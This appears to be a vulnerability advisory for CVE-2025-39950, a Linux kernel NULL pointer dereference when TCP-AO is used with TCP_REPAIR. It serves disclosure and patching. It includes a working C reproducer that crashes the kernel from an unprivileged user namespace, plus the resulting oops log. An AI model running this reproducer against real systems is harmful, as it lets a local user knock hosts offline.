CVE-2025-39950

Description

In the Linux kernel, the following vulnerability has been resolved:

net/tcp: Fix a null pointer dereference when using TCP-AO with TCP_REPAIR

A null pointer dereference can occur in tcp_ao_finish_connect() during a
connect() system call on a socket with a TCP-AO key added and TCP_REPAIR
enabled.

The function is called with skb being null and attempts to dereference it
on tcp_hdr(skb)->seq without a prior skb validation.

Fix this by checking if skb is null before dereferencing it.

The commentary is taken from bpf_skops_established(), which is also called
in the same flow. Unlike the function being patched,
bpf_skops_established() validates the skb before dereferencing it.

#include <arpa/inet.h>
#include <endian.h>
#include <linux/tcp.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>

int main(void)
{
	struct sockaddr_in sockaddr;
	struct tcp_ao_add tcp_ao;
	int sk;
	int one = 1;

	memset(&sockaddr, 0, sizeof(sockaddr));
	memset(&tcp_ao, 0, sizeof(tcp_ao));

	sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	sockaddr.sin_family = AF_INET;

	/* Add a TCP-AO key bound to the (still zeroed) peer address. */
	memcpy(tcp_ao.alg_name, "cmac(aes128)", 12);
	memcpy(tcp_ao.key, "ABCDEFGHABCDEFGH", 16);
	tcp_ao.keylen = 16;

	memcpy(&tcp_ao.addr, &sockaddr, sizeof(sockaddr));

	setsockopt(sk, IPPROTO_TCP, TCP_AO_ADD_KEY, &tcp_ao, sizeof(tcp_ao));
	/* TCP_REPAIR requires CAP_NET_ADMIN, obtained below via unshare -Urn. */
	setsockopt(sk, IPPROTO_TCP, TCP_REPAIR, &one, sizeof(one));

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_port = htobe16(123);

	inet_aton("127.0.0.1", &sockaddr.sin_addr);

	/* In repair mode connect() reaches tcp_ao_finish_connect() without an skb. */
	connect(sk, (struct sockaddr *)&sockaddr, sizeof(sockaddr));

	return 0;
}

$ gcc tcp-ao-nullptr.c -o tcp-ao-nullptr -Wall
$ unshare -Urn

BUG: kernel NULL pointer dereference, address: 00000000000000b6
PGD 1f648d067 P4D 1f648d067 PUD 1982e8067 PMD 0
Oops: Oops: 0000 [#1] SMP NOPTI
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
RIP: 0010:tcp_ao_finish_connect (net/ipv4/tcp_ao.c:1182)
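The faulting path described above, modelled in user space as an added example (it is neither kernel code nor the reporter's reproducer): a stand-in for tcp_hdr(skb) that, like the kernel's, derives the TCP header from fields of skb itself, placed beside the unguarded initialisation and the guarded version the description calls for ("checking if skb is null before dereferencing it"). Every struct layout and name here (skb_model, tcphdr_model, tcp_ao_model, finish_connect_unpatched, finish_connect_patched, make_skb, run_demo, fault_offset) is an assumption for illustration; putting transport_header at offset 0xb6 mirrors the oops address on the assumption that the first load tcp_hdr() performs on a NULL skb is that field, which this page does not state. The upstream patch itself is not reproduced on this page.

```c
/* Added example: user-space model of the NULL skb dereference in
 * tcp_ao_finish_connect(). All structs and names are simplified stand-ins
 * for struct sk_buff / struct tcphdr / struct tcp_ao_info, not kernel code. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Only the two fields the header lookup needs. The kernel computes the TCP
 * header as skb->head + skb->transport_header. */
struct skb_model {
    unsigned char pad[0xb6];    /* assumption: mirrors the oops address 0xb6 */
    uint16_t transport_header;
    unsigned char *head;
};

struct tcphdr_model {
    uint16_t source;
    uint16_t dest;
    uint32_t seq;
};

/* Per-socket TCP-AO state that the connect path initialises from the SYN-ACK. */
struct tcp_ao_model {
    uint32_t risn;      /* remote initial sequence number, read from skb */
    uint32_t rcv_sne;
};

/* Offset of the first skb field touched: where a NULL skb faults. */
size_t fault_offset(void)
{
    return offsetof(struct skb_model, transport_header);
}

static struct tcphdr_model *tcp_hdr(const struct skb_model *skb)
{
    /* With skb == NULL this loads from address fault_offset(). */
    return (struct tcphdr_model *)(skb->head + skb->transport_header);
}

/* Unguarded version: correct only when the caller really has a SYN-ACK skb,
 * which the TCP_REPAIR connect() path does not supply. */
static void finish_connect_unpatched(struct tcp_ao_model *ao,
                                     const struct skb_model *skb)
{
    ao->risn = tcp_hdr(skb)->seq;
    ao->rcv_sne = 0;
}

/* Guarded version, following the fix described on the page: touch skb only
 * when one was supplied; a repair-mode socket keeps its existing risn. */
static void finish_connect_patched(struct tcp_ao_model *ao,
                                   const struct skb_model *skb)
{
    if (skb)
        ao->risn = tcp_hdr(skb)->seq;
    ao->rcv_sne = 0;
}

/* Constructed skb whose transport header carries the given sequence number. */
static void make_skb(struct skb_model *skb, unsigned char *buf, uint32_t seq)
{
    struct tcphdr_model th = { .source = 0, .dest = 0, .seq = seq };

    memset(skb, 0, sizeof(*skb));
    memcpy(buf, &th, sizeof(th));
    skb->head = buf;
    skb->transport_header = 0;
}

/* Returns 1 when both versions read risn from a real skb and the guarded
 * version also survives the repair-mode (skb == NULL) call. The unguarded
 * version is deliberately never called with NULL: it would fault here too. */
int run_demo(void)
{
    uint32_t buf[16];
    struct skb_model skb;
    struct tcp_ao_model ao = { 0, 0 };

    make_skb(&skb, (unsigned char *)buf, 0x11223344);

    finish_connect_unpatched(&ao, &skb);
    if (ao.risn != 0x11223344)
        return 0;

    ao.risn = 0;
    finish_connect_patched(&ao, &skb);
    if (ao.risn != 0x11223344)
        return 0;

    ao.risn = 0xdeadbeef;               /* value a repaired socket already holds */
    finish_connect_patched(&ao, NULL);  /* TCP_REPAIR connect(): no skb */
    return ao.risn == 0xdeadbeef && ao.rcv_sne == 0;
}

int main(void)
{
    printf("guarded handler survives NULL skb: %s\n", run_demo() ? "yes" : "no");
    printf("first skb field touched sits at 0x%zx\n", fault_offset());
    return 0;
}
```

Reaching the real path needs a kernel built with CONFIG_TCP_AO and CAP_NET_ADMIN for the TCP_REPAIR setsockopt; the reproducer obtains the capability in a fresh user and network namespace (unshare -Urn), which is why an unprivileged local user can crash the host wherever unprivileged user namespaces are permitted, consistent with the AV:L/PR:L/A:H vector below.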

Risk Information

Base Score: 5.5 (MODERATE)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
EPSS Score (exploitation probability): 0.012

Associated Vulnerability

No records found

Patch Details

No records found

References

https://nvd.nist.gov/vuln/detail/CVE-2025-39950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-39950